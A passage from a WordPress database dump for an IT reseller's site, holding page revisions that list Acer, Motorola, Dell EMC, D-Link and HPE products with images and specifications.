alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2018-12-17 17:27:49','2018-12-17 09:27:49','',1430,'https://bintara.com.my/blog/2018/12/17/1430-revision-v1/',0,'revision','',0),(2324,1,'2018-12-17 17:40:20','2018-12-17 09:40:20','<h3>Business Product Solution</h3>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"1\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2018-12-17 17:40:20','2018-12-17 09:40:20','',1430,'https://bintara.com.my/blog/2018/12/17/1430-revision-v1/',0,'revision','',0),(2371,1,'2018-12-18 19:04:22','2018-12-18 11:04:22','<h2>BLUETOOTH HEADSETS</h2>\n<table style=\"height: 335px;\" width=\"800\">\n<tbody>\n<tr>\n<td width=\"100\">\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2387\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-HZ800.png\" alt=\"\" width=\"124\" height=\"124\" /></p>\n<p style=\"text-align: center;\"><strong style=\"font-family: inherit; font-size: inherit;\">HZ800</strong></p>\n</td>\n<td width=\"100\">&nbsp;\n<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-2389 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/S305-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" /><strong>S305</strong></p>\n</td>\n<td width=\"100\">&nbsp;\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2378 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H525-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" /></p>\n<p style=\"text-align: center;\"><strong>H525</strong></p>\n</td>\n<td width=\"100\">&nbsp;\n<p style=\"text-align: center;\"><img class=\"size-full wp-image-2379 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H720-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" /></p>\n<p style=\"text-align: center;\"><strong style=\"font-family: inherit; font-size: inherit;\">H720</strong></p>\n</td>\n<td width=\"100\">\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2380\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H730-Motorola.png\" alt=\"\" width=\"136\" height=\"136\" /></p>\n<p style=\"text-align: center;\"><strong>H730</strong></p>\n</td>\n<td width=\"100\">\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2381\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H790-Motorola.png\" alt=\"\" width=\"143\" height=\"143\" /></p>\n<p style=\"text-align: center;\"><strong>H790</strong></p>\n</td>\n</tr>\n<tr>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2382\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HK100-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" />\n<p style=\"text-align: center;\"><strong>HK100</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2383\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HK200-HK201-HK202.png\" alt=\"\" width=\"110\" height=\"110\" />\n<p style=\"text-align: center;\"><strong>HK200 / HK201 / HK202</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2384\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HX520.png\" alt=\"\" width=\"110\" height=\"110\" />\n<p style=\"text-align: center;\"><strong>HX520</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2385\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HX550.png\" alt=\"\" width=\"110\" height=\"110\" />\n<p style=\"text-align: center;\"><strong>HX550</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2386\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HZ720.png\" alt=\"\" width=\"110\" height=\"110\" />\n<p style=\"text-align: center;\"><strong>HZ720</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2388\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/S10-HD.png\" alt=\"\" width=\"110\" height=\"110\" />\n<p style=\"text-align: center;\"><strong>S10 HD</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n<h2></h2>\n<h2></h2>\n<h2>WALKIE TALKIE</h2>\n<table style=\"height: 358px;\" width=\"997\">\n<tbody>\n<tr>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2400\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-XT180-Walkie-Talkies-2-Way-Radios.jpg\" alt=\"\" width=\"351\" height=\"444\" />\n<p style=\"text-align: center;\"><strong>Motorola XT180 Walkie Talkies &amp; 2 Way Radios</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2398\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-TLKR-T61-2-Pack.jpg\" alt=\"\" width=\"600\" height=\"600\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Motorola TLKR-T61 2 Pack</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2399\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Walkie-Talkie-TLKR-T60Z-2-Handsets.jpg\" alt=\"\" width=\"1500\" height=\"1500\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Motorola Walkie Talkie TLKR T60Z (2 Handsets)</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2397\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-TLKR-T41.jpg\" alt=\"\" width=\"600\" height=\"600\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Motorola TLKR-T41</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2401\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tlkr-t40.jpg\" alt=\"\" width=\"1600\" height=\"1600\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Motorola Walkie Talkie TLKR t40</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone  wp-image-2395\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-T260-Rechargeable-Two-Way-Radios.jpg\" alt=\"\" width=\"207\" height=\"155\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Motorola T260 Rechargeable Two-Way Radios</strong></p>\n</td>\n</tr>\n<tr>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2396\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Talkabout-T465-Rechargeable-Two-Way-Radio-Bundle-.jpg\" alt=\"\" width=\"500\" height=\"500\" />\n<p style=\"text-align: center;\"><strong>Motorola Talkabout T465 Rechargeable Two-Way Radio BundleÂ </strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2390\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-GP328.png\" alt=\"\" width=\"427\" height=\"427\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Motorola GP328</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2391\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-E8600-Digital.png\" alt=\"\" width=\"300\" height=\"300\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR E8600 Digital)</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P6600-Digital.jpg\" alt=\"\" width=\"427\" height=\"427\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P6600 Digital)</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2394\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P6620-Digital.png\" alt=\"\" width=\"300\" height=\"300\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P6620 Digital)</strong></p>\n</td>\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2392\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P3688-Digital.jpg\" alt=\"\" width=\"324\" height=\"324\" />\n\n&nbsp;\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P3688 Digital)</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n[maxbutton id=\"1\" ]','Motorola','','inherit','closed','closed','','1550-autosave-v1','','','2018-12-18 19:04:22','2018-12-18 11:04:22','',1550,'https://bintara.com.my/blog/2018/12/18/1550-autosave-v1/',0,'revision','',0),(2325,1,'2018-12-17 17:47:03','2018-12-17 09:47:03','<h3 class=\"eyebrow large\">IT TRANSFORMATION SOLUTIONS</h3>\r\n<div class=\"heading-container\">\r\n<h4 class=\"section-heading\">Modernize your infrastructure.\r\nMaximize results.</h4>\r\n</div>\r\nModernize IT to boost your IT spend on innovation, invest in new digital products and services, and grow your business with Dell EMC technology.\r\n\r\n&nbsp;\r\n<div class=\"row \">\r\n<div class=\"col-12 col-sm-12 col-md-12 col-lg-12 col-xl-12 col-xxl-12\">\r\n<div class=\"heading-container text-center\">\r\n<h3 class=\"eyebrow large\">HYPER-CONVERGED AND CONVERGED</h3>\r\n<h4 class=\"heading\">Simplify IT. Modernize with hyper-converged and converged infrastructure.</h4>\r\nHyper-converged and converged infrastructures are the smart, efficient way to modernize and simplify your IT.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"row stats-n-list\">\r\n<div class=\"list-container col-12 col-md-6 push-md-6\">\r\n<ul class=\"list\">\r\n 	<li>Accelerate time to value for new IT services</li>\r\n 	<li>Optimize data center operations with advanced architecture to greatly improve efficiency</li>\r\n 	<li>Increase speed of business and innovation</li>\r\n</ul>\r\n</div>\r\n</div>','Dell EMC','','inherit','closed','closed','','1478-revision-v1','','','2018-12-17 17:47:03','2018-12-17 09:47:03','',1478,'https://bintara.com.my/blog/2018/12/17/1478-revision-v1/',0,'revision','',0),(2408,1,'2018-12-18 19:48:20','2018-12-18 11:48:20','','ENFORCE CORPORATE POLICIES','','inherit','closed','closed','','enforce-corporate-policies','','','2018-12-18 19:48:20','2018-12-18 11:48:20','',1445,'https://bintara.com.my/wp-content/uploads/2018/12/ENFORCE-CORPORATE-POLICIES.png',0,'attachment','image/png',0),(2370,1,'2018-12-18 15:32:33','2018-12-18 07:32:33','D - Link Business Solution Product : -\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2359\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" width=\"500\" height=\"500\" />\r\n\r\nAC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Point\r\n\r\n&nbsp;\r\n\r\nâ€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps\r\n\r\nâ€¢ MU-MIMO with beamforming\r\n\r\nâ€¢ Band steering\r\n\r\nâ€¢ Gigabit PoE-capable LAN port\r\n\r\nâ€¢ AP Array utility support\r\n\r\nâ€¢ Free D-Link Central WiFiManager\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2360\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" width=\"510\" height=\"600\" />\r\n\r\n2.4GHz Wireless N300 Outdoor Access Point\r\n\r\n&nbsp;\r\n\r\n- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through\r\n\r\n- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion\r\n\r\n- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage\r\n\r\n- Weather-proof design (IPX6) built to withstand harsh environments\r\n\r\n- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater\r\n\r\n- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic\r\n\r\n- Provides WLAN partitioning for deployments such as wireless hot spots\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2361\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" width=\"510\" height=\"600\" />\r\n\r\nAC1750 Wireless Dual-Band PoE Access Point\r\n\r\n&nbsp;\r\n\r\nâ€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards\r\n\r\nâ€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band\r\n\r\nâ€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP\r\n\r\nâ€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications\r\n\r\nâ€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band\r\n\r\nâ€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet\r\n\r\nâ€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client\r\n\r\nâ€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis\r\n\r\nâ€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2362\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" width=\"510\" height=\"600\" />\r\n\r\nN600 Wireless Dual-Band PoE Access Point\r\n\r\n&nbsp;\r\n\r\nâ€¢ Simultaneous Dual Band Connectivity for high performance\r\n\r\nâ€¢ SupportÂ  up toÂ  300 Mbps speedÂ  in both 2.4 GHz and 5 GHz band\r\n\r\nâ€¢ Gigabit Ethernet port with 802.3af Power over Ethernet support\r\n\r\nâ€¢ Support Multiple operation mode â€“ AP, Client, WDS, WDS with AP\r\n\r\nâ€¢ Equipped with Rugged Metal &amp; Plenum-rated housing\r\n\r\nâ€¢ Built in Radius server and support Network Access Protection (NAP)\r\n\r\nâ€¢ Support Rogue AP Detection, Wireless Broadcast Scheduling\r\n\r\nâ€¢ Support Central Wi-Fi Manager to configure and manage multiple AP\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2363\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" width=\"510\" height=\"600\" />\r\n\r\nAC1300 Wireless Dual-Band PoE Access Point\r\n\r\n&nbsp;\r\n\r\nEnjoy High-performance Wireless Connectivity\r\n\r\nâ€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications\r\n\r\nMU-MIMO with Beamforming\r\n\r\nâ€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network\r\n\r\nMultiple Operational Modes\r\n\r\n-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2364\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" width=\"510\" height=\"600\" />\r\n\r\nN300 Wireless PoE Access Point\r\n\r\n&nbsp;\r\n\r\nâ€¢ High-speed wireless performance with 300 Mbps wireless signal rates\r\n\r\nâ€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications\r\n\r\nâ€¢ Gigabit Ethernet port with 802.3af Power over Ethernet\r\n\r\nâ€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client\r\n\r\nâ€¢ Support Inbuilt Radius server, Network Access protection (NAP)\r\n\r\nâ€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation\r\n\r\nâ€¢ Support Central WiFi Manager to configure and manage multiple AP\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n</tr>\r\n</tbody>\r\n</table>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-18 15:32:33','2018-12-18 07:32:33','',1480,'https://bintara.com.my/blog/2018/12/18/1480-revision-v1/',0,'revision','',0),(2525,1,'2018-12-18 23:42:42','2018-12-18 15:42:42','<h2>SERVER AND SYSTEM</h2>\r\n<ol>\r\n 	<li><strong>Rack Servers</strong></li>\r\n</ol>\r\nRack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.\r\n<ul>\r\n 	<li><strong>HPE ProLiant DL325 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2509\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" />\r\n\r\nSecure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.\r\n<ul>\r\n 	<li><strong>HPE ProLiant DL385 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2511\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" />\r\n\r\nHewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.\r\n<ul>\r\n 	<li><strong>HPE Apollo 6000 Chassis</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2512\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"202\" height=\"151\" />\r\n\r\nThe HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.\r\n\r\n2.Â <strong>Tower Servers</strong>\r\n\r\nLower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.\r\n<ul>\r\n 	<li><strong>HPE ProLiant ML110 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2513\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" />\r\n\r\nThe HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and 